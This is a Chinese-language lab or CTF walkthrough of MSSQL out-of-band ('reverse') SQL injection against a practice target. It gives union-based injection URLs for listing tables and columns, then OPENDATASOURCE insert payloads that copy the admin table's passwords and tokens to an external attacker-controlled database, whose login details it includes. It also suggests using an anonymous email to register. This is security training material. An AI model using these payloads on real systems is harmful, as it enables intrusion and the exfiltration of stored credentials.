MSSQL-反彈注入

工具：香港雲免費雲服務器：http://www.webweb.com

註冊使用匿名郵箱：https://bccto.me/

香港雲服務器搭建MSSQL數據庫，並建表admin，字段數要大於等於咱們想要獲取的表。

首先打開靶場：http://59.63.200.79:8015/?id=1
嘗試是否可注入：

閉合;

經過order by查詢到表中爲三字段。後來經過問別人知道里面還有一字段類型是二進制大對象 不支持order by——-因此說是四個字段，建表時儘量多建吧。
先按照視頻上講的對靶場數據庫進行表名，字段名查詢常規操做，便於理解，可是實際反彈注入中可能不會出現：
查表名：http://59.63.200.79:8015/?id=1%27%20union%20select%20id,name,null%20from%20sysobjects%20where%20xtype=%27U%27--+

查到各表名及其在sysobjects系統自帶表中的id。
查admin表中字段名：http://59.63.200.79:8015/?id=1%27%20union%20select%20id,name,null%20from%20syscolumns%20where%20id=1977058079%20--+

查表中內容：

查出了id、passwd、token。其中token可能就是flag.
接下來嘗試反彈注入：
註冊香港雲：
帳號：saddadsadadsa
香港運登陸密碼：12345678
數據庫庫名：DB_14B8A3E_AAAA
數據庫密碼：12345678
數據庫連接地址：SQL5006.webweb.com
數據庫用戶名：DB_14B8A3E_AAAA_admin
在香港雲的數據庫中建立一個大於三字段的表，用來接收數據。

咱們建立了一個叫admin的四字段表用來接收反彈注入數據；
構建語句：insert into opendatasource(‘sqloledb’,’server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA’).DB_14B8A3E_AAAA.dbo.admin select * from admin —+
執行情況：

得到flag.固然這裏數據只有一條，實戰中應該結合系統自表明一步步查詢。
insert into opendatasource(‘sqloledb’,’server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA’).DB_14B8A3E_AAAA.dbo.admin select null,null,name,null from sysobjects where xtype=’U’ —+
查詢出全部用戶建立表：

得到表的id。
查詢admin表中字段：insert into opendatasource(‘sqloledb’,’server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA’).DB_14B8A3E_AAAA.dbo.admin select * from syscolumns where id=1977058079 —+

得到字段.
得到表中數據：insert into opendatasource(‘sqloledb’,’server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA’).DB_14B8A3E_AAAA.dbo.admin select%20 id,passwd,token,username from admin —+

得到flag.